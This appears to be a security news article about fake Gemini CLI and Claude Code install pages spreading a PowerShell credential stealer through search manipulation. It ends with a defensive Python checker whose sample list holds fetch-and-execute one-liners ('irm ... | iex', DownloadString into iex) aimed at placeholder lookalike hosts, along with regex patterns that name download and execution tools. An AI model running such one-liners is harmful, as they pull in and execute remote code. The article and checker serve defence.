AI tool impostors target developer credentials

Fake installation pages impersonating Google’s Gemini CLI and Anthropic’s Claude Code are being pushed through search manipulation campaigns that place malicious domains above legitimate results, exposing developers and enterprises to credential theft, cryptocurrency wallet compromise and follow-on network intrusion.

The campaign, identified across activity beginning in early March 2026, uses SEO poisoning and sponsored search placement to capture users looking for AI coding tools. Developers searching for Gemini CLI or Claude Code installation instructions are directed to lookalike pages that closely mimic official documentation. The pages then prompt users to copy and run installation commands that appear routine but instead fetch malicious PowerShell scripts from attacker-controlled infrastructure.

The operation reflects a wider shift in cybercrime tactics as AI coding assistants move deeper into corporate software development workflows. Gemini CLI, released as an open-source command-line AI agent, and Claude Code, Anthropic’s terminal-based coding assistant, are attractive lures because users expect to install them through command-line instructions. Attackers are exploiting that familiarity by replacing legitimate one-line commands with malware delivery instructions.

Security teams tracking the campaign found that Windows systems were a primary target. The payload executes largely in memory through PowerShell, reducing the forensic footprint on disk. Once active, it fingerprints the host, disables parts of PowerShell event logging, checks for analysis environments and gathers a broad set of sensitive material before encrypting and sending the stolen data to command-and-control servers.

The data targeted by the infostealer goes well beyond browser passwords. The malware is designed to collect OAuth tokens, CI/CD credentials, collaboration platform authentication keys, corporate VPN details, cloud access material, browser cookies, session tokens, sensitive files and cryptocurrency wallet data. Such access can give attackers a route from a single developer workstation into source code repositories, deployment pipelines and wider enterprise systems.

The campaign also contains a loader function, giving operators the ability to run additional PowerShell commands on selected compromised machines. That capability turns what first appears to be a credential theft operation into a potential entry point for hands-on intrusion, lateral movement and targeted exploitation of higher-value victims.

Investigators have linked the activity to financially motivated e-crime operators rather than state-backed groups. The structure of the campaign points to scalable credential harvesting, but the focus on developer systems raises the potential impact. Developers often hold privileged access to codebases, package registries, production systems, cloud consoles and internal collaboration tools, making them valuable targets for attackers seeking both data theft and supply-chain access.

The Gemini-themed activity used domains designed to resemble legitimate installation destinations, including pages that presented what looked like normal setup instructions. In some cases, the malicious command retrieved an installer script from a separate attacker domain, adding another layer to the infection chain. Claude Code-themed pages followed a similar pattern, presenting cloned documentation or install guides and redirecting users back to genuine pages after interaction to reduce suspicion.

A related wave of activity earlier this year used cloned software pages and malicious ads to target users searching for developer and utility tools including VPN clients, password managers, secure file-transfer applications and note-taking software. By April, the same broader technique had moved more directly towards AI development tools, reflecting the speed with which attackers adapt to search demand and developer trends.

The attraction of this method lies in its simplicity. Unlike email phishing, the victim initiates the interaction by searching for software they already intend to install. Search ads and poisoned rankings then provide the attacker with a credible delivery route that bypasses many email security controls. The copy-and-paste installation habit common in developer ecosystems further lowers resistance, especially when documentation pages appear visually authentic.

The risk is heightened by the rapid adoption of agentic coding tools in enterprises. AI assistants are being used to read repositories, generate code, submit pull requests, manage tests and interact with developer tooling. As these tools become embedded in workflows, attackers are increasingly treating their brands, installation pages and package ecosystems as high-value infrastructure for social engineering.

Defensive measures centre on controlling installation sources, restricting unverified script execution and monitoring for suspicious PowerShell behaviour. Organisations are being urged to require developers to verify domains before running installation commands, prefer package managers and repositories with authenticated provenance, block known malicious domains, inspect command-line activity and rotate credentials after suspected exposure.
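
As an added example (not part of the original article), the Python check below applies two of the measures above, verifying the download domain and inspecting command-line activity, to a copied install one-liner or a logged process command line. The approved host `install.vendor.example` and every sample command are constructed placeholders; replace the allowlist with install domains your organisation has verified.

```python
import re
from urllib.parse import urlsplit

# Assumption: install hosts your organisation has verified. Placeholder value.
APPROVED_HOSTS = {"install.vendor.example"}

URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.I)
# Tools/cmdlets that fetch remote content, and ways of executing it directly.
FETCH_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b|\|\s*(sh|bash|pwsh|powershell)\b", re.I)


def review_install_command(cmd, approved=APPROVED_HOSTS):
    """Return (verdict, reasons) for an install one-liner or logged command line."""
    reasons, unapproved = [], False
    for url in URL_RE.findall(cmd):
        parts = urlsplit(url)
        # .hostname drops any "user@" prefix, so trusted-name@other-host
        # is judged by the host that is actually contacted.
        host = (parts.hostname or "").lower().rstrip(".")
        if parts.scheme.lower() != "https":
            reasons.append(f"non-HTTPS download from {host}")
        if host.startswith("xn--") or ".xn--" in host:
            reasons.append(f"punycode host {host}")
        if host not in approved:  # exact match: a trusted prefix is not enough
            unapproved = True
            reasons.append(f"host not on approved list: {host}")
    if unapproved and FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("remote script is fetched and executed in one step")
        return "block", reasons
    return ("review" if reasons else "allow"), reasons


# Constructed sample commands (reserved .example/.test names, not real indicators).
SAMPLES = [
    "irm https://install.vendor.example/install.ps1 | iex",
    "irm https://install.vendor.example.lookalike.test/install.ps1 | iex",
    "irm https://install.vendor.example@lookalike.test/install.ps1 | iex",
    "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://cdn.lookalike.test/a.ps1')\"",
    "curl -O https://files.lookalike.test/tool.zip",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, why = review_install_command(sample)
        print(f"{verdict:6} {sample}\n       {'; '.join(why) or 'no findings'}")
```

The second and third samples show why the host comparison is an exact match on the parsed hostname: a trusted name used as a subdomain prefix or as URL userinfo still resolves to a different host.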